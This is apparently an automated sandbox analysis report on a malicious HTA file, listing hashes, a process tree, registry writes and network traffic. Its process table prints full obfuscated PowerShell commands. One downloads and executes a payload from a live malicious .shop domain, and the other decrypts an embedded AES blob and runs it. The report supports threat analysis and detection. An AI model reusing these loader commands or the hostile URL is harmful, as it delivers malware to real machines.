| File name: | kangarooing.hta |
| Full analysis: | https://app.any.run/tasks/68a6dd28-42a9-490d-ab53-c845dff6b38d |
| Verdict: | Malicious activity |
| Analysis date: | February 11, 2025, 19:39:54 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | data |
| MD5: | 40CEA72F1F84DC9686707C2428748EEF |
| SHA1: | BD56C6647C70D9E8A68034A4479269B4A49CDF7A |
| SHA256: | 034694376C291C82789E7DC2C8771A4DFF47C1C447F2EA7427EDB968F480FA71 |
| SSDEEP: | 12288:VTa8fAZkPKRmLDIkiXAwwEiEl25YUwPHdH5i5hwHhxo2nfsXj55I/kzvFmkARdUF:5 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 3952 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6612 | "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -Command SI Variable:\p 'https://kangla.klipxytozyi.shop/kangarooing.bmp';item *z;SI Variable:\Yj (&(Get-Variable E*tex*).Value.(((Get-Variable E*tex*).Value|Member)[6].Name).(((Get-Variable E*tex*).Value.(((Get-Variable E*tex*).Value|Member)[6].Name).PsObject.Methods|?{(GV _ -ValueOnl).Name-ilike '*lets'}).Name).Invoke('*w-*ct')Net.WebClient);.(Get-Item Alias:\*EX) (GCI Variable:/Yj).Value.((((GCI Variable:/Yj).Value|Member)|?{(GV _ -ValueOnl).Name-ilike '*nl*g'}).Name).Invoke((ChildItem Variable:/p).Value) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6704 | "C:\Windows\SysWOW64\mshta.exe" C:\Users\admin\AppData\Local\Temp\kangarooing.hta {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | C:\Windows\SysWOW64\mshta.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6840 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CijC($DimRSpi){-split($DimRSpi -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$Nqsh=CijC('A18EE0207C545302B72F45DF70FF796E8903BEFCC3AD2FCB0E761DE2412A289D4C550258A486F062128ED8326775AAA7711270EEFDB28019F3BE9311CE16664BE4D0FFB477B7E2205F748257AFEBF3C97D8BD5222241E09EEAE703CE7CDD20E4B0A5A71D0AE014C20429EA4BE9ADE2A1CE0E7A8BFB30EAF0A172EE4E6A7E62F3A02C2B1FCC8415DE11FF9D64F01501643E699AF97F46E0C746D3D41238BBD3962A8CE0179293E7BBD45D36C372CA30915BDFACB1C149D720F2C1096474FC2BB67FD8AC590206BD198CB170F5D8CF1B1DE02121554E580EF88AA727CB03EB0835C1580CC7583871263900098CF769AB43931B9BDF8FAB4B2AF22EF3913321343199A425FD3A80324D42423D6F428C9170B9C18230F6863B2E607242054E28BAB737F3193913E10BF665A87D669C9DF6FA0D869CB9232BD009DB9985E453607E2FC2C3AEE8D4A701E9692C081FC217F7C244800F57AF6B68939D2DEC2E0A3036F1BD81AE3F64CF2CD2987E4E574C3FE423C2E17C32FF309A35518982992B1A7EE5A0812FEB37F21D4DF4A76B80F738D5CF6743CFDF814F4B2C89E3E56A0C88685861AF2CC18DB8DD88085C017EDE34A1FE1DBED3691E67C54D4F6C924DEC57FFAA734219BBA260C9D561CCE03FACF031BC1B560B5A2C7783E86FDEF3F3BEF20B824E1BA3E305BDAB0D27A2C49494B4A8A11BFA9B7F1F987FF21B51CDA21A1639864733CB19A1A2A659E0331FF883569FE426F358D3AF37CC6551FCFDB1A5FC84E83A569A7D54D2654274E9C6C3AFF80AFCE33BADE2C1ECBD36150D38DAF68F6D255AC3DEBAD5FF3B27867881EF1034970D2D47A3F1F647B3A011506DA813B72A211799C39949B9195A9550583121BE1002142B33E74C4D088E609CF695E217FA732599938DE2BCE0BCA9C61338FCCBA3D68BB41FF4B102A8D263C4B11A24FEF767F6A152A53A1E6DE6559E062AC45C4A8B03999FD8B14647CC8FB29FCE08EB8E9185C4DA959E465D52975FA86D13F3693A00512E16E27D16886FC255AD236A79D3A73CADEA3712846B1759D65DF9C6EDBBB99B85C30D06B66C4139BCEE35A63835C44757AE7844DD2BE8A6E8ED2C4030CC269986FA1B9F46D25681F5E92B46015F6DB9649A507BE0F471CE6B6FA020558AAB31D6E3CCFA3C6D7CBDBA2AC950069588B74E8BD96758CF6FBA634F52EA4A806A0FC812DECC823EB18C32AD3EC9530A2E8491776A6B1D897E4B5C436FAA37B32862C0B54E800846DA29CB9D625F27DC978E54B8B790CF007263EA774F82D0C5DAF0CC3F660DCFB73F2C20996E934EE5A75F45911606E6B07B9674BE670A1690');$RjYEaMLuZ=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((CijC('416B7652685A635669524E7976547165')),[byte[]]::new(16)).TransformFinalBlock($Nqsh,0,$Nqsh.Length)); & $RjYEaMLuZ.Substring(0,3) $RjYEaMLuZ.Substring(3) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6852 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6612) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (6612) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (6612) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (6612) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (6612) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (6612) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (6612) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (6612) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (6612) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (6612) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6612 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5jwi5liz.gme.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6840 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:B2C22835C7F90554CF61F5FB963C8152 | SHA256:0AA0F4716102B51DFBDD6201152139781E65CABAF6E373FF482B8F92F0D3B900 | |||
| 6612 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tvqq4owr.ppa.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6612 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 6840 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fqx4bjtq.2jy.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6840 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vkjni0xr.ian.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
6484 | backgroundTaskHost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
3832 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
— | — | GET | 200 | 23.207.210.96:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
3832 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 184.86.251.15:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
— | — | 23.207.210.96:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1176 | svchost.exe | 20.190.160.3:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
kangla.klipxytozyi.shop |
| unknown |
slscr.update.microsoft.com |
| whitelisted |